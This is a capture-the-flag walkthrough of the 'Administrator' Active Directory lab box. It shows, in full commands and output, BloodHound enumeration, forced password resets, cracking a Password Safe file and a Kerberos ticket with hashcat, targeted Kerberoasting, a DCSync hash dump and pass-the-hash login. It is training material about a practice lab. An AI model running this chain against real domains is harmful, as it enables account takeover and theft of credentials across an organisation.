Introduction #
Administrator is an Active Directory focused box starting with assumed breach - one set of credentials - I can use to collect BloodHound data. From that there is clear attack chain abusing the privileges discovered in the BH data. That chain ends with discovery of Password Safe file containing more credentials opening new path to root ending with DCSync attack dumping the domain administrator’s hash and completely compromising the domain.
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Username: Olivia Password: ichliebedich
Recon #
nmap #
nmap finds lots of TCP ports:
sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.8.125
-sCfor defaults scripts-sVenumerate version-vvdouble verbose-oAoutput in all formats
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-12-09 16:11:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m50s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55604/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46728/tcp): CLEAN (Couldn't connect)
| Check 3 (port 60636/udp): CLEAN (Timeout)
| Check 4 (port 46791/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-12-09T16:11:21
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Based on ports the box is a Windows Domain Controller. The domain is administrator.htb with DC hostname.
Also an FTP is open which is not standard for a DC.
I can generate host file:
└─$ netexec smb 10.129.8.125 --generate-hosts-file administrator.hosts
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
└─$ cat administrator.hosts
10.129.8.125 DC.administrator.htb administrator.htb DC
and add it to /etc/hosts
Initial Credentials #
The initial credentials work for both SMB and LDAP:
└─$ netexec smb administrator.htb -u Olivia -p ichliebedich
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [+] administrator.htb\Olivia:ichliebedich
└─$ netexec ldap administrator.htb -u Olivia -p ichliebedich
LDAP 10.129.8.125 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
LDAP 10.129.8.125 389 DC [+] administrator.htb\Olivia:ichliebedich
SMB - TCP 445 #
Looking at SMB there is nothing.
└─$ smbclient -L //administrator.htb/ -U 'Olivia%ichliebedich'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to administrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
BloodHound #
With SMB being dead end at the moment next best thing is BloodHound:
└─$ bloodhound-ce-python -c all -d administrator.htb -u Olivia -p 'ichliebedich' -ns 10.129.8.125 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20251209042654_bloodhound.zip
Looking at bloodhound output there is clear attack chain.
I have credentials to Olivia how had GenericAll rights over next user - Michael
Next step will be to move from Michael to Benjamin using the ForceChangePassword rights Michael has.
And finally I will have access to the SHARE MODERATORS group via its member Benjamin.
Attack chain #
Shell as Michael #
Starting with Michael I will change his password:
└─$ bloodyAD --host administrator.htb -d dc.administrator.htb -u Olivia -p "ichliebedich" set password "Michael" "Pwned123"
[+] Password changed successfully!
Testing the new password:
└─$ netexec smb administrator.htb -u Michael -p Pwned123
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [+] administrator.htb\Michael:Pwned123
I can use evil-winrm -i 10.129.8.125 -u Michael -p 'Pwned123' to rm in, but there was nothing of interest.
Shell as Benjamin #
With Michael owned I can move to the next target, with much more restrictive rights of ForceChangePassword I do not have such a wealth of options like with GenericAll but the simplest one remains and I can again change the password:
└─$ bloodyAD --host administrator.htb -d dc.administrator.htb -u Michael -p "Pwned123" set password "Benjamin" "Pwned123"
[+] Password changed successfully!
Testing the new password:
└─$ netexec smb administrator.htb -u Benjamin -p Pwned123
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [+] administrator.htb\Benjamin:Pwned123
It works for SMB but this time not for WinRM. But it does for FTP:
└─$ netexec ftp administrator.htb -u Benjamin -p Pwned123
FTP 10.129.8.125 21 administrator.htb [+] Benjamin:Pwned123
└─$ ftp administrator.htb
Connected to DC.administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): Benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
There is Backup.psafe3 file I can download and word with on my machine:
ftp> ls
229 Entering Extended Passive Mode (|||50077|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||50078|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************| 952 40.47 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (37.94 KiB/s)
ftp>
Backup.psafe3 #
A .psafe3 file is an encrypted Password Safe database file, used to securely store usernames, passwords, and other sensitive info, accessible only with a master password.
With the file in my possesion I can try to crack it.
└─$ hashcat -m 5200 Backup.psafe3 ~/Tools/rockyou.txt
hashcat (v6.2.6) starting
< SNIP >
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Backup.psafe3:tekieromucho
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Tue Dec 9 05:29:41 2025 (1 sec)
Time.Estimated...: Tue Dec 9 05:29:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9669 H/s (7.03ms) @ Accel:256 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344384 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4608/14344384 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: terminator -> horoscope
Hardware.Mon.#1..: Util: 55%
Started: Tue Dec 9 05:29:13 2025
Stopped: Tue Dec 9 05:29:43 2025
And there is a hit giving me the master password: tekieromucho
Opening the file with the Password Safe app gives me three passwords:
- emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
- emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
- alexandr:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
To validate them I will try them on SMB:
└─$ netexec smb administrator.htb -u emma -p 'WwANQWnmJnGV07WQN8bMS7FMAbjNur'
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
└─$ netexec smb administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
└─$ netexec smb administrator.htb -u alexandr -p 'UrkIbagoxMyUGw0aPlj9B0AXSea4Sw'
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [-] administrator.htb\alexandr:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
Only one - emily works!
I can use Evil-WinRM to get in and grab the user flag:
└─$ evil-winrm -i 10.129.8.125 -u Emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cat ../Desktop/user.txt
580d91f************29edaf2a287
*Evil-WinRM* PS C:\Users\emily\Documents>
Looking back to BloodHound there is clear next step:
Emily has GenericWrite rights over another account - Ethan who is the key to the domain as he has SCSync privileges over the domain.
Ethan password #
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “servicePrincipalNames” for a user.
The GenericWrite gives me enough privileges to perform a targeted kerberoasting.
I can assign an SPN to ethan then I can request a ticket for that fake service, and get a ticket encrypted with ethan’s password hash which I can try to crack offline.
Or use this script that does that all automatically:
└─$ sudo ntpdate administrator.htb
2025-12-09 13:24:22.188698 (-0500) +25251.033755 +/- 0.012476 administrator.htb 10.129.8.125 s1 no-leap
CLOCK: time stepped by 25251.033755
└─$ python3 targetedKerberoast.py -v -d administrator.htb -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$7994c13865d2d1f7edd3c63d5806d9d2$150888aa3584ffc75faf3dd8889d1cda0fe10f49dca39dbd403546c83c3cfcb4cf2b57e7a907dc2af24c4015866323c007e5752cfe2cf880ceaf2c0d762be1b13393da96ac45225ab7f177a1190af272a3ee7ea4bd027b9ebc878ca702c2ecad6ded8f43bdc9b66215853f8678d818f6527d05c3a7758b851a61481659ef2e2dca869bfe924692765da8312dbf014829ded32a4de2dec1de90b64266416d51426135c2f8f30cdaea3fab0527c244d297f38624e1cbac9dfb6b2456ecccbeee5aabaf8b0c736b91737e5945b685c86753ffd4d2e73a2183dbc067ce50d9ce975ff3bc44bcb0275441eb9e605c0db1b630d154babd072c17f9b4499328e1f921a665c8e8279261caeb87e520230590ada3aff0026b8ef2f69796e2caae0585c1a50b0fbbd433bec761dbd5ce616106c9293d837e5882d87aa2d532e1261382e069c82a2820f09e7fcb62f791481f4b5fbc86acd28de73f25ea9d24752318205975a6f72571428551978db7df5eabf1a34d8e350656d881e06d4267c63bd177915198a6190414baa373ca6fa1c6959f23136a4543b4f5b1b9376df695a5dcc0e5d97a196cc87d1e9db70e79dcc3a9103d61e046243af79af4c7909604cc52fd61f3e12ef6c40e9e48e37e4e61398396fdb3c619a09bed0c60da00ea516ba1b584a3ea2f6af878cc06b55276e049a7ab9e165e0159cdeac49a2612be34fbb9b926b852e062cd5a1eebe2f3af434eb89d60ddb0ce9d7947193916f2dcaeeeb64409d07c2750e8a64a3e419929da5a17579f0f7babb21b9e06e254f41d1b9d196774f4c3d302ff1dc803d9ed6d4ac6c9693e12fcd92fba9d35da6136a2adfc31a0107e302eddcb279dcf495c4eba9cddf6b522c5d85c677d0377388d87f4e983df6aebc3f55258247abb6246ad6e741883823dfae4a9ef445599109d70f38b7db3f3fdcea0de412af6b6d64e443e66c10768c6b63c9645fc9499f271fe33e4ed345f995a7e03834b56a310a26ab720792d91ad25c74de39a17641cc1e3428537564d9187e8f5d246db951a07994dcdc5fc8a1ed07f8c1db5b6040affcdf5e421cfe000a9133055ffef21ddee6186501d09683164932978ccded42605e7c243c067c07d07f025b16dc474231ec057ed30da71f74b241b7933fb272d4299e13f4a8973c917b88a4c291ab3d4649e893876106eee9eb54748bda5c46cd915c67075b4580d6bdcc68d3b22f1388c447e0cc6ba57d3884dd412c8fbad6e92c642fe4612c51f1bec1eae4f84572de46a8fb7f421acdafabc16833396583d91135fa392c2f9912c6971918d2fb01781754b32bdf5e183a5bc1824b7a230bc4ffc44dcc75cd371601ea882d1995f3e871e6021b2e9bd8ef1dd95d08f6d00b107f0de506f3ae27c6ab16a93b28f31848de29d79d50a84af71c1f15480c241691dfb3c4c66e987287b1062859895429a37b4692ea95e2f7bcdacab0ca266281755769b4480cf22408e1150e383212a370bdc6e9061d6d5e37850d09a78207fc91949e1792efdb6
[VERBOSE] SPN removed successfully for (ethan)
Now I can attempt to crack it:
└─$ hashcat -m 13100 ethan.hash ~/Tools/rockyou.txt
hashcat (v6.2.6) starting
< SNIP >
Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$7994c138653cfcb4cf2< SNIP >
81755769b4480cf22408e1150e383212a370bdc6e9061d6d5e37850d09a78207fc91949e1792efdb6:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....2efdb6
Time.Started.....: Tue Dec 9 06:26:19 2025 (0 secs)
Time.Estimated...: Tue Dec 9 06:26:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 569.5 kH/s (2.27ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344384 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> horoscope
Hardware.Mon.#1..: Util: 36%
Started: Tue Dec 9 06:26:01 2025
Stopped: Tue Dec 9 06:26:21 2025
The cracked password limpbizkit works:
└─$ netexec smb administrator.htb -u Ethan -p 'limpbizkit'
SMB 10.129.8.125 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.125 445 DC [+] administrator.htb\Ethan:limpbizkit
Now I can move to the Administrator
Shell as Administrator #
The Ethan user had DCSync privileges over the domain:
With this rights I can dump hashes for the entire domain using secretsdump from impacket:
└─$ impacket-secretsdump ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:04ebb1d6ca2529562dc0f66cd47e6f02:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:04ebb1d6ca2529562dc0f66cd47e6f02:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:d08beb3f2eb8bd2a6e2d4945030477929289e33b8e3d4a8b882acd00fea0bf0e
administrator.htb\michael:aes128-cts-hmac-sha1-96:52722146c8f6c532e002ca87b1b298f0
administrator.htb\michael:des-cbc-md5:920108fe2f0d54f1
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:56a1c13702a51f7d746a7202672eb5fa76a7c6cc03441af72f4794395ebf20f6
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:f558414cbdd7d203a3f35f9902e0ce49
administrator.htb\benjamin:des-cbc-md5:fbd96efb2c834558
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
With the password hash for the local administrator account I can get a shell with Evil-WinRM:
└─$ evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
93345eb7f***********63a26165
*Evil-WinRM* PS C:\Users\Administrator\Documents>
With the root flag captured I am done!